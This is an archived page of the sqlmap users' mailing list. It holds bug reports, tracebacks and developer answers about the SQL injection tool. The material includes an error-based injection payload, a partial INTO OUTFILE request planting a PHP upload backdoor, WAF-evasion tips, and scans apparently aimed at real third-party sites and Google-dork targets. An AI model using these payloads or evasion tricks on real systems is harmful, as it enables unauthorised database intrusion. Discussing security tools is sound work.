sqlmap-users — sqlmap users mailing list

[sqlmap-users] Host header invalid when following redirections

[rmillet <rmi...@gm...>]

Hi,

I have some questions about the redirections in sqlmap.

The command I used with version sqlmap/1.0-dev (r4495):
./sqlmap.py -u '
http://192.168.1.42/redirect.php?url=http%3A%2F%2F127.0.0.1%2Fpage'

The page on redirect.php on 192.168.1.42 redirects with a 302 Location
header to http://127.0.0.1/page


Is it possible to desactivate following of redirections ?

When it follows the redirection, sqlmap connects to 127.0.0.1
- with in the Referer set to "http://192.168.1.42", is it normal that it is
not the original URL ?
- with Host header set to "192.168.1.42", this is a bug as it must be
"127.0.0.1"


Regards,

Re: [sqlmap-users] Update query

[Bernardo D. A. G. <ber...@gm...>]

Hi David,

On 8 November 2011 13:13, David Alvarez <dav...@gm...> wrote:
> ...
> The problem is that sqlmap is not able to detect differences because when
> sqlmap execute A) the value will be locked, so the following requests won't
> modify the results in the database, the item is locked, and all responses
> will be equal.
> To unlock the item, you have to execute another functionality.So, how does
> sqlmap deal in these situations?

What do you mean by "execute another functionality"? If you just need
to perform a certain GET request, then fine, sqlmap can do it. Use
switches:
    --safe-url=SAFURL   Url address to visit frequently during testing
    --safe-freq=SAFREQ  Test requests between two visits to a given safe url

Refer to the user's manual for details.

> A solution could be provide the unlock request and execute that funcionality
> after every request made by sqlmap, in order to unlock the item and detect
> changes in the responses. However, this duplicates the number of requests
> needed.

At the moment --safe-url only supports a GET request, we can think of
making it able to get the raw request from a text file instead so it
would also support POST (like for -r).

Cheers,
Bernardo


-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: Unavailable

[sqlmap-users] Update query

[David A. <dav...@gm...>]

Hello,

I detected a simple sql injection in an update query. The vulnerable
functionality locks items of a list.

An example of the vulnerable parameter is:
A) vuln_param=1 AND 1=1
B) vuln_param=1 AND 1=0

The problem is that sqlmap is not able to detect differences because when
sqlmap execute A) the value will be locked, so the following requests won't
modify the results in the database, the item is locked, and all responses
will be equal.

To unlock the item, you have to execute another functionality.So, how does
sqlmap deal in these situations?

A solution could be provide the unlock request and execute that
funcionality after every request made by sqlmap, in order to unlock the
item and detect changes in the responses. However, this duplicates the
number of requests needed.

kr

Re: [sqlmap-users] error on injectable site

[Miroslav S. <mir...@gm...>]

Hi Liang.

First of all please update to the latest v1.0-dev from our repository
to have it up to date:
svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

Second of all, in those kind of cases, where you have connection
timeouts FIRST THING you start the sqlmap, and you are absolutely sure
that there are no proxy problems involved, switch --random-agent does
miracles. There are WAFs that filter all HTTP traffic containing
"sqlmap" as an HTTP "User-Agent" header and --random-agent masks that
header value with some valid browser-like one.

Kind regards,
Miroslav Stampar

On Sun, Nov 6, 2011 at 4:32 AM, Liang Guo <lia...@me...> wrote:
>
> Hi sqlmap team
> this is a great tool, however, if i want to inject on sites that stop on the sql error, sqlmap got connection timed out error.
> is there a option i have to use or is it just a bug?
> Thanks you very much
> -----------------command--------------------------------------------
> ./sqlmap.py -u "http://www.hubbardbrook.org/gis/data.php?id=3"
>     sqlmap/0.9 - automatic SQL injection and database takeover tool
>     http://sqlmap.sourceforge.net
> [*] starting at: 11:21:22
> [11:21:22] [INFO] using '/Users/Downloads/sqlmap/output/www.hubbardbrook.org/session' as session file
> [11:21:22] [INFO] testing connection to the target url
> [11:21:52] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
> [11:22:23] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
> [11:22:54] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
> [11:23:25] [CRITICAL] connection timed out to the target url or proxy
>
> ------------------------------------------------------------------------------
> RSA(R) Conference 2012
> Save $700 by Nov 18
> Register now
> http://p.sf.net/sfu/rsa-sfdev2dev1
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>



--
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] [CRITICAL] unable to find results for your Google dork expression

[Miroslav S. <mir...@gm...>]

Hi Choi.

It should be fixed with the latest commit.

Kind regards,
Miroslav Stampar

On Sat, Nov 5, 2011 at 3:06 AM, Choi Ho <cou...@gm...> wrote:
> The above error msg keep showing since a few days ago.
> Do you guys what happened ?
> Google changed their HTML searching things?
> Please advise me to solve the problem.
> Thanks.
> Regards,
> ------------------------------------------------------------------------------
> RSA(R) Conference 2012
> Save $700 by Nov 18
> Register now
> http://p.sf.net/sfu/rsa-sfdev2dev1
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>



-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] error on injectable site

[Liang G. <lia...@me...>]

Hi sqlmap team 
this is a great tool, however, if i want to inject on sites that stop on the sql error, sqlmap got connection timed out error.
is there a option i have to use or is it just a bug?

Thanks you very much

-----------------command--------------------------------------------
./sqlmap.py -u "http://www.hubbardbrook.org/gis/data.php?id=3"

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 11:21:22

[11:21:22] [INFO] using '/Users/Downloads/sqlmap/output/www.hubbardbrook.org/session' as session file
[11:21:22] [INFO] testing connection to the target url
[11:21:52] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[11:22:23] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[11:22:54] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
[11:23:25] [CRITICAL] connection timed out to the target url or proxy

[sqlmap-users] [CRITICAL] unable to find results for your Google dork expression

[Choi Ho <cou...@gm...>]

The above error msg keep showing since a few days ago.
 Do you guys what happened ?
 Google changed their HTML searching things?
 Please advise me to solve the problem.
 Thanks.
Regards,

[sqlmap-users] os-shell bug

[Robin W. <ro...@di...>]

I think I've found a bug in the os-shell command when specifying extra
directories to try to upload a shell file to. In this example I've
told it the full document root is /opt/lampp/htdocs but I've made a
directory in there called uploads which has full write permissions. I
specify the uploads directory when asked for additional web server
paths, giving it the full server path of /opt/lampp/htdocs/uploads.
Watching the traffic in Burp it first tries to upload to the root
which fails, it then tries the uploads directory but when it checks to
see if the file has been uploaded it checks for the temporary file in
the vulnerabilities directory not the uploads directory. It then tries
an upload to the vulnerabilities directory (it has previously detected
this so I assume that is why it is trying it) and again fails but does
try to check the right directory this time. I've attached a screenshot
from Burp showing the hits.

Manually checking the uploads directory it hasn't managed to upload
the file even though it should be able to as the directory is fully
writable and the db is mysql running as root, I think this could be
down to the query being sent across. I know the decoding here isn't
quite right but it is adding the php to the wrong place in the query:

GET /vulner«ilities/sqli/?id= % LIMIT% 1% INTO% OUTFILE%
%'%/opt%/lampp%/htdocs%/uplo­ads%/tmpuzmzk.php%'% LINES% TERMINATí%
BY% 0x<?php
if (isset($_REQUEST["upload"])) {
    $dir=$_REQUEST["uploadDir"];


I'm doing all of this against DVWA with a manually created uploads directory.

Robin


sqlmap-dev $ ./sqlmap.py -c dvwa.conf --os-shell --proxy=http://localhost:8080

    sqlmap/1.0-dev (r4488) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without
prior mutual consent is illegal. It is the end user's responsibility
to obey all applicable local, state and federal laws. Authors assume
no liability and are not responsible for any misuse or damage caused
by this program

[*] starting at 12:42:06

[12:42:07] [INFO] using
'/Users/robin/src/sqlmap-dev/output/192.168.56.101/session' as session
file
[12:42:07] [INFO] resuming injection data from session file
[12:42:07] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[12:42:07] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0
HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=12 AND (SELECT 6722 FROM(SELECT
COUNT(*),CONCAT(0x3a64657a3a,(SELECT (CASE WHEN (6722=6722) THEN 1
ELSE 0 END)),0x3a6a76633a,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Submit=Submit
---

[12:42:09] [INFO] the back-end DBMS is MySQL

web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: MySQL 5.0
[12:42:09] [INFO] going to use a web backdoor for command prompt
[12:42:09] [INFO] fingerprinting the back-end DBMS operating system
[12:42:09] [INFO] the back-end DBMS operating system is Linux
[12:42:09] [INFO] trying to upload the file stager
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] PHP (default)
[4] JSP
> 3
[12:42:12] [WARNING] unable to retrieve the web server document root
please provide the web server document root [/var/www/]: /opt/lampp/htdocs
[12:42:19] [WARNING] unable to retrieve any web server path
please provide any additional web server full path to try to upload
the agent [Enter for None]: /opt/lampp/uploads/
[12:42:30] [INFO] heuristics detected web page charset 'ascii'
[12:42:33] [WARNING] unable to upload the file stager on '/opt/lampp/htdocs'
[12:42:36] [WARNING] unable to upload the file stager on '/opt/lampp/uploads'
[12:42:38] [WARNING] unable to upload the file stager on
'/opt/lampp/htdocs/vulnerabilities'
[12:42:38] [WARNING] HTTP error codes detected during testing:
404 (Not Found) - 3 times
[12:42:38] [INFO] Fetched data logged to text files under
'/Users/robin/src/sqlmap-dev/output/192.168.56.101'

[*] shutting down at 12:42:38

Re: [sqlmap-users] Tor proxy port detection broken (and fixed)

[Miroslav S. <mir...@gm...>]

sorry, I can see from the patch what's the problem at the first place :)

will apply the patch. thank you.

kind regards

On Thu, Oct 27, 2011 at 12:36 PM, Miroslav Stampar
<mir...@gm...> wrote:
> Hi Alexander.
>
> The same thing you've done is problematic on Privoxy. We have to find
> some other way for fixing this.
>
> Kind regards
>
> On Thu, Oct 27, 2011 at 12:09 PM, Alexander Rigbo <al...@ri...> wrote:
>> Hello,
>>
>> Yesterday I encountered a bug in sqlmap. The tor port detection was broken due to this change in lib/core/settings.py:
>>
>> -DEFAULT_TOR_PORTS = (8118, 8123)
>> +DEFAULT_TOR_PORTS = (8123, 8118)
>>
>> The reason this broke it for me is because my polipo is running at port 8118, and the code that tries to connect to these ports does not properly reinitiate the socket used. See my attached patch.
>>
>> Best regards,
>> Alexander
>>
>>
>>
>>
>>
>>
>> ------------------------------------------------------------------------------
>> The demand for IT networking professionals continues to grow, and the
>> demand for specialized networking skills is growing even more rapidly.
>> Take a complimentary Learning@Cisco Self-Assessment and learn
>> about Cisco certifications, training, and career opportunities.
>> http://p.sf.net/sfu/cisco-dev2dev
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] Tor proxy port detection broken (and fixed)

[Miroslav S. <mir...@gm...>]

Hi Alexander.

The same thing you've done is problematic on Privoxy. We have to find
some other way for fixing this.

Kind regards

On Thu, Oct 27, 2011 at 12:09 PM, Alexander Rigbo <al...@ri...> wrote:
> Hello,
>
> Yesterday I encountered a bug in sqlmap. The tor port detection was broken due to this change in lib/core/settings.py:
>
> -DEFAULT_TOR_PORTS = (8118, 8123)
> +DEFAULT_TOR_PORTS = (8123, 8118)
>
> The reason this broke it for me is because my polipo is running at port 8118, and the code that tries to connect to these ports does not properly reinitiate the socket used. See my attached patch.
>
> Best regards,
> Alexander
>
>
>
>
>
>
> ------------------------------------------------------------------------------
> The demand for IT networking professionals continues to grow, and the
> demand for specialized networking skills is growing even more rapidly.
> Take a complimentary Learning@Cisco Self-Assessment and learn
> about Cisco certifications, training, and career opportunities.
> http://p.sf.net/sfu/cisco-dev2dev
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>



-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] Tor proxy port detection broken (and fixed)

[Alexander R. <al...@ri...>]

Hello,

Yesterday I encountered a bug in sqlmap. The tor port detection was broken due to this change in lib/core/settings.py:

-DEFAULT_TOR_PORTS = (8118, 8123)
+DEFAULT_TOR_PORTS = (8123, 8118)

The reason this broke it for me is because my polipo is running at port 8118, and the code that tries to connect to these ports does not properly reinitiate the socket used. See my attached patch.

Best regards,
Alexander

[sqlmap-users] BUG

[yarolinux b. | t. <yar...@gm...>]

[03:04:51] [WARNING] HTTP error codes detected during testing:
403 (Forbidden) - 1 times

[03:04:51] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4009), retry
your run with the latest development version from the Subversion repository.
If the exception persists, please send by e-mail to
sql...@li... the following text and any information
required to reproduce the bug. The developers will try to reproduce the bug,
fix it accordingly and get back to you.
sqlmap version: 1.0-dev (r4009)
Python version: 2.6.5
Operating system: posix
Command line: ./sqlmap.py -u
****************************************************************************
--dbs --random-agent --tor
Technique: None
Back-end DBMS: None (identified)
Traceback (most recent call last):
  File "./sqlmap.py", line 86, in main
    start()
  File "/pentest/database/sqlmap/lib/controller/controller.py", line 447, in
start
    injection = checkSqlInjection(place, parameter, value)
  File "/pentest/database/sqlmap/lib/controller/checks.py", line 324, in
checkSqlInjection
    _ = Request.queryPage(genCmpPayload(), place, raise404=False)
  File "/pentest/database/sqlmap/lib/request/connect.py", line 603, in
queryPage
    page = removeReflectiveValues(page, payload)
  File "/pentest/database/sqlmap/lib/core/common.py", line 2514, in
removeReflectiveValues
    if regex.split(REFLECTED_NON_ALPHA_NUM_REGEX)[0].lower() in
content.lower(): # fast optimization check
UnicodeDecodeError: 'ascii' codec can't decode byte 0xe2 in position 324:
ordinal not in range(128)

[*] shutting down at: 03:04:51

Re: [sqlmap-users] Bug report.

[Miroslav S. <mir...@gm...>]

Hi.

Thank you for your report. It should be fixed with the latest commit.
There is a possibility that you'll need to report that original
exception causing problem - in that case please contact me privately.

Kind regards

On Wed, Oct 19, 2011 at 5:52 PM, Soma Cruz <ole...@gm...> wrote:
> [INFO] 972/4352 links visited (22%)
> [19:50:08] [ERROR] thread MainThread: unhandled exception in sqlmap/1.0-dev
> (r4407), retry your run with the latest development version from the
> Subversion repository. If the exception persists, please send by e-mail to
> sql...@li... the following text and any information
> required to reproduce the bug. The developers will try to reproduce the bug,
> fix it accordingly and get back to you.
> sqlmap version: 1.0-dev (r4407)
> Python version: 2.7.1
> Operating system: posix
> Command line: ./sqlmap.py --tor -u **************** --crawl=5 --dbms=mysql
> --sql-shell --batch
> Technique: None
> Back-end DBMS: MySQL (identified)
>
>
> [19:50:08] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4407), retry
> your run with the latest development version from the Subversion repository.
> If the exception persists, please send by e-mail to
> sql...@li... the following text and any information
> required to reproduce the bug. The developers will try to reproduce the bug,
> fix it accordingly and get back to you.
> sqlmap version: 1.0-dev (r4407)
> Python version: 2.7.1
> Operating system: posix
> Command line: ./sqlmap.py --tor -u **************** --crawl=5 --dbms=mysql
> --sql-shell --batch
> Technique: None
> Back-end DBMS: MySQL (identified)
> Traceback (most recent call last):
>   File "/home/0x90/PycharmProjects/Laary/_sqlmap.py", line 77, in main
>     init(cmdLineOptions)
>   File "/home/0x90/PycharmProjects/Laary/lib/core/option.py", line 1877, in
> init
>     __setCrawler()
>   File "/home/0x90/PycharmProjects/Laary/lib/core/option.py", line 424, in
> __setCrawler
>     crawler.getTargetUrls()
>   File "/home/0x90/PycharmProjects/Laary/lib/utils/crawler.py", line 114, in
> getTargetUrls
>     runThreads(numThreads, crawlThread)
>   File "/home/0x90/PycharmProjects/Laary/lib/core/threads.py", line 167, in
> runThreads
>     traceback.print_exc()
> NameError: global name 'traceback' is not defined
> [*] shutting down at 19:50:09
>
> ------------------------------------------------------------------------------
> All the data continuously generated in your IT infrastructure contains a
> definitive record of customers, application performance, security
> threats, fraudulent activity and more. Splunk takes this data and makes
> sense of it. Business sense. IT sense. Common sense.
> http://p.sf.net/sfu/splunk-d2d-oct
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>



-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] Bug report.

[Soma C. <ole...@gm...>]

[INFO] 972/4352 links visited (22%)
[19:50:08] [ERROR] thread MainThread: unhandled exception in sqlmap/1.0-dev
(r4407), retry your run with the latest development version from the
Subversion repository. If the exception persists, please send by e-mail to
sql...@li... the following text and any information
required to reproduce the bug. The developers will try to reproduce the bug,
fix it accordingly and get back to you.
sqlmap version: 1.0-dev (r4407)
Python version: 2.7.1
Operating system: posix
Command line: ./sqlmap.py --tor -u **************** --crawl=5 --dbms=mysql
--sql-shell --batch
Technique: None
Back-end DBMS: MySQL (identified)


[19:50:08] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4407), retry
your run with the latest development version from the Subversion repository.
If the exception persists, please send by e-mail to
sql...@li... the following text and any information
required to reproduce the bug. The developers will try to reproduce the bug,
fix it accordingly and get back to you.
sqlmap version: 1.0-dev (r4407)
Python version: 2.7.1
Operating system: posix
Command line: ./sqlmap.py --tor -u **************** --crawl=5 --dbms=mysql
--sql-shell --batch
Technique: None
Back-end DBMS: MySQL (identified)
Traceback (most recent call last):
  File "/home/0x90/PycharmProjects/Laary/_sqlmap.py", line 77, in main
    init(cmdLineOptions)
  File "/home/0x90/PycharmProjects/Laary/lib/core/option.py", line 1877, in
init
    __setCrawler()
  File "/home/0x90/PycharmProjects/Laary/lib/core/option.py", line 424, in
__setCrawler
    crawler.getTargetUrls()
  File "/home/0x90/PycharmProjects/Laary/lib/utils/crawler.py", line 114, in
getTargetUrls
    runThreads(numThreads, crawlThread)
  File "/home/0x90/PycharmProjects/Laary/lib/core/threads.py", line 167, in
runThreads
    traceback.print_exc()
NameError: global name 'traceback' is not defined

[*] shutting down at 19:50:09

Re: [sqlmap-users] Exception OverflowError: range() result has too many items

[Miroslav S. <mir...@gm...>]

Hi.

Please checkout latest v1.0-dev from our SVN repository to have it fixed.

Kind regards,
Miroslav Stampar
On Oct 16, 2011 12:51 PM, "Rafael Tavares" <jr...@gm...> wrote:

> Hi,
>
> I`m testing sqlmap in ubuntu 10.04, I`ve got the following error while
> doing google search, What could be causing it?
>
>
> [21:45:39] [CRITICAL] unhandled exception in sqlmap/0.9, retry your run
> with the latest development version from the Subversion repository. If the
> exception persists, please send by e-mail to
> sql...@li... the following text and any information
> required to reproduce the bug. The developers will try to reproduce the bug,
> fix it accordingly and get back to you.
> sqlmap version: 0.9 (r3630)
> Python version: 2.7.1+
> Operating system: posix
> Command line: ./sqlmap.py -g inurl:produto.php?id= --dbs -v 2
> Technique: BOOLEAN
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 82, in main
>     start()
>   File "/home/dextervip/sqlmap/lib/controller/controller.py", line 447, in
> start
>     action()
>   File "/home/dextervip/sqlmap/lib/controller/action.py", line 88, in
> action
>     conf.dumper.dbs(conf.dbmsHandler.getDbs())
>   File "/home/dextervip/sqlmap/plugins/generic/enumeration.py", line 704,
> in getDbs
>     indexRange = getRange(count, plusOne=plusOne)
>   File "/home/dextervip/sqlmap/lib/core/common.py", line 1072, in getRange
>     indexRange = range(limitStart - 1, limitStop)
> OverflowError: range() result has too many items
>
> [*] shutting down at: 21:45:39
>
>
>
>
>
>
> ------------------------------------------------------------------------------
> All the data continuously generated in your IT infrastructure contains a
> definitive record of customers, application performance, security
> threats, fraudulent activity and more. Splunk takes this data and makes
> sense of it. Business sense. IT sense. Common sense.
> http://p.sf.net/sfu/splunk-d2d-oct
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

[sqlmap-users] Exception OverflowError: range() result has too many items

[Rafael T. <jr...@gm...>]

Hi,

I`m testing sqlmap in ubuntu 10.04, I`ve got the following error while doing
google search, What could be causing it?


[21:45:39] [CRITICAL] unhandled exception in sqlmap/0.9, retry your run with
the latest development version from the Subversion repository. If the
exception persists, please send by e-mail to
sql...@li... the following text and any information
required to reproduce the bug. The developers will try to reproduce the bug,
fix it accordingly and get back to you.
sqlmap version: 0.9 (r3630)
Python version: 2.7.1+
Operating system: posix
Command line: ./sqlmap.py -g inurl:produto.php?id= --dbs -v 2
Technique: BOOLEAN
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
  File "./sqlmap.py", line 82, in main
    start()
  File "/home/dextervip/sqlmap/lib/controller/controller.py", line 447, in
start
    action()
  File "/home/dextervip/sqlmap/lib/controller/action.py", line 88, in action
    conf.dumper.dbs(conf.dbmsHandler.getDbs())
  File "/home/dextervip/sqlmap/plugins/generic/enumeration.py", line 704, in
getDbs
    indexRange = getRange(count, plusOne=plusOne)
  File "/home/dextervip/sqlmap/lib/core/common.py", line 1072, in getRange
    indexRange = range(limitStart - 1, limitStop)
OverflowError: range() result has too many items

[*] shutting down at: 21:45:39

Re: [sqlmap-users] Randomize payload with uppercase/lowercase

[Vinícius K-M. <vin...@gm...>]

Ignacio and Miroslav, thank you guys!

Em 8 de outubro de 2011 10:04, Miroslav Stampar
<mir...@gm...>escreveu:

> Hi.
>
> You can use --tamper=randomcase for your case.
>
> Kind regards,
> Miroslav Stampar
> On 8.10.2011. 12:37, "Vinícius K-Max" <vin...@gm...> wrote:
>



-- 
Vinícius

Re: [sqlmap-users] 500 (Internal Server Error) - 1 times

[Miroslav S. <mir...@gm...>]

hi.

this should be fixed some week(s) ago. could you please confirm that
you run up to date revision (svn update)?

kind regards

On Sun, Oct 9, 2011 at 12:02 AM, d33 d33 <d3...@gm...> wrote:
> I get the message "500 (Internal Server Error) - 1 times"
> whenever I try to run the SqlMap, which could be this error?
>
> [18:32:59] [INFO] testing connection to the target url
> [18:33:02] [INFO] testing if the url is stable, wait a few seconds
> [18:33:05] [INFO] url is stable
> [18:33:05] [INFO] testing if GET parameter 'id' is dynamic
> [18:33:08] [INFO] confirming that GET parameter 'id' is dynamic
> [18:33:11] [INFO] GET parameter 'id' is dynamic
> [18:33:12] [INFO] heuristic test shows that GET parameter 'id' might be
> injectable (possible DBMS: MySQL)
> [18:33:12] [INFO] testing sql injection on GET parameter 'id'
> [18:33:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
> [18:33:43] [CRITICAL] connection timed out to the target url or proxy,
> sqlmap is going to retry the request
> [18:33:43] [CRITICAL] unable to access item 'previousMethod'
> [18:33:43] [WARNING] HTTP error codes detected during testing:
> 500 (Internal Server Error) - 1 times
>
> [*] shutting down at: 18:33:43
>
>
> ------------------------------------------------------------------------------
> All of the data generated in your IT infrastructure is seriously valuable.
> Why? It contains a definitive record of application performance, security
> threats, fraudulent activity, and more. Splunk takes this data and makes
> sense of it. IT sense. And common sense.
> http://p.sf.net/sfu/splunk-d2dcopy2
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] How to authenticate Central Authentication Service(CAS) with SQLMap?

[Sherif El-D. <arc...@gm...>]

This is how you should do it:
1- login to  CAS with valid credentials using your browser.
2- after successful login, get your session cookie "use any proxy, firebux,
or any other way"
3- after that, run sqlmap using the "--cookie=COOKIE", it will work :)

Sherif Eldeeb

On Sat, Oct 8, 2011 at 10:18 AM, Metin Emenullahi <me...@mt...>wrote:

> Hi there,
>
> I have a problem with CAS. I have a website which has several applications
> based on CAS and I want to do some SqlInjection tests in order to close
> holes in the system as much as possible. But because of the ticket system of
> CAS, I couldn't pass the login screen with SQLMap. How can I login to the
> site, by providing username and password via SQLMap?
>
> Thanks in advance.
>
>
> --
>
> -- o --
> Metin Emenullahi
> IEEE METU Student Branch
> System Administrator
>
>
> ------------------------------------------------------------------------------
> All of the data generated in your IT infrastructure is seriously valuable.
> Why? It contains a definitive record of application performance, security
> threats, fraudulent activity, and more. Splunk takes this data and makes
> sense of it. IT sense. And common sense.
> http://p.sf.net/sfu/splunk-d2dcopy2
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

[sqlmap-users] 500 (Internal Server Error) - 1 times

[d33 d. <d3...@gm...>]

I get the message "500 (Internal Server Error) - 1 times"
whenever I try to run the SqlMap, which could be this error?

[18:32:59] [INFO] testing connection to the target url
[18:33:02] [INFO] testing if the url is stable, wait a few seconds
[18:33:05] [INFO] url is stable
[18:33:05] [INFO] testing if GET parameter 'id' is dynamic
[18:33:08] [INFO] confirming that GET parameter 'id' is dynamic
[18:33:11] [INFO] GET parameter 'id' is dynamic
[18:33:12] [INFO] heuristic test shows that GET parameter 'id' might be
injectable (possible DBMS: MySQL)
[18:33:12] [INFO] testing sql injection on GET parameter 'id'
[18:33:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:33:43] [CRITICAL] connection timed out to the target url or proxy,
sqlmap is going to retry the request
[18:33:43] [CRITICAL] unable to access item 'previousMethod'
[18:33:43] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 1 times

[*] shutting down at: 18:33:43

Re: [sqlmap-users] Multipart POST requests

[Miroslav S. <mir...@gm...>]

Hi.

Is there a possibility to send sample log file you've used so I could take a
look what's going on?

Kind regards
On 7.10.2011. 11:22, "Paule Puhmann" <ko...@gm...> wrote:

> Hello list!
>
> First off: Thanks for the great tool!
>
> I'm trying to run sqlmap on a multipart/form-data POST request which I'm
> passing to the tool with the '-l' option. I was using the 0.9 packaged
> version, which didn't work at all, then checked out yesterdays dev-version
> and retried. This time sqlmap ran its tests against the request's first
> parameter and then stopped, stating that no parameter is injectable.
>
> Is it currently supported to inject multipart POST requests and I'm doing
> something wrong, or is this a bug? Thanks in advance!
>
> Cheers,
> Dennis
> --
> NEU: FreePhone - 0ct/min Handyspartarif mit Geld-zurück-Garantie!
> Jetzt informieren: http://www.gmx.net/de/go/freephone
>
>
> ------------------------------------------------------------------------------
> All of the data generated in your IT infrastructure is seriously valuable.
> Why? It contains a definitive record of application performance, security
> threats, fraudulent activity, and more. Splunk takes this data and makes
> sense of it. IT sense. And common sense.
> http://p.sf.net/sfu/splunk-d2dcopy2
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

Re: [sqlmap-users] Randomize payload with uppercase/lowercase

[Miroslav S. <mir...@gm...>]

Hi.

You can use --tamper=randomcase for your case.

Kind regards,
Miroslav Stampar
On 8.10.2011. 12:37, "Vinícius K-Max" <vin...@gm...> wrote:

Re: [sqlmap-users] Randomize payload with uppercase/lowercase

[Ignacio H. <nac...@gm...>]

You can use a tamper. Check the tampers folder. You can create your own une
to achieve that if there isn't one for it.
El 08/10/2011 12:37, "Vinícius K-Max" <vin...@gm...>
escribió:

> hello
>
> I can manually bypass an WAF/filter with this trick: uNiOn aLl sElEcT...
> and so on.
>
> Is there an option like this in sqlmap?
>
> Thanks!
>
> --
> Vinícius
>
>
> ------------------------------------------------------------------------------
> All of the data generated in your IT infrastructure is seriously valuable.
> Why? It contains a definitive record of application performance, security
> threats, fraudulent activity, and more. Splunk takes this data and makes
> sense of it. IT sense. And common sense.
> http://p.sf.net/sfu/splunk-d2dcopy2
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

[sqlmap-users] Randomize payload with uppercase/lowercase

[Vinícius K-M. <vin...@gm...>]

hello

I can manually bypass an WAF/filter with this trick: uNiOn aLl sElEcT... and
so on.

Is there an option like this in sqlmap?

Thanks!

-- 
Vinícius

[sqlmap-users] How to authenticate Central Authentication Service(CAS) with SQLMap?

[Metin E. <me...@mt...>]

Hi there,

I have a problem with CAS. I have a website which has several applications
based on CAS and I want to do some SqlInjection tests in order to close
holes in the system as much as possible. But because of the ticket system of
CAS, I couldn't pass the login screen with SQLMap. How can I login to the
site, by providing username and password via SQLMap?

Thanks in advance.


-- 

-- o --
Metin Emenullahi
IEEE METU Student Branch
System Administrator